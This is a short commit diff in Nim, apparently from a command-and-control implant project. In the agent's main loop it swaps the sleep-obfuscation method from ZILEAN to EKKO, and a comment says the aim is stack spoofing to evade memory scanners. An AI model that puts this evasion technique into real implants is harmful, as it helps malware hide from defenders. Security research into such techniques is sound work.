Improved sleep obfuscation cleanup.

This commit is contained in:
Jakob Friedl
2025-09-03 08:46:38 +02:00
parent b19f8e1236
commit 653dfac4b4
2 changed files with 25 additions and 15 deletions

View File

@@ -36,7 +36,7 @@ proc main() =
while true:
# Sleep obfuscation with stack spoofing to evade memory scanners
sleepObfuscate(ctx.sleep * 1000, ZILEAN)
sleepObfuscate(ctx.sleep * 1000, EKKO)
# sleep(ctx.sleep * 1000)
let date: string = now().format("dd-MM-yyyy HH:mm:ss")